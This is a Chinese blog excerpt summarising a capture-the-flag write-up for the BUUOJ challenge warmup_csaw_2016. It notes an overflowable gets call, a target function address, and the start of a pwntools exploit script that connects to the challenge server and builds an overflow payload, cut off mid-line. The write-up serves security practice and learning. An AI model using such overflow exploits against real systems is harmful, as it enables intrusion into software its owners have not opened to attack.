buuoj warmup_csaw_2016
摘要:
放进IDA,找到gets 接收0x40位,然后查看字符串,虽然没有bin/sh,但是有能直接用的 找到所在函数和地址 exp: from pwn import * p=remote('node3.buuoj.cn',27180) sys_addr=0x40060D payload='a'*(0x40 阅读全文
posted @ 2021-04-07 12:13 diakla 阅读(75) 评论(0) 推荐(0)
浙公网安备 33010602011771号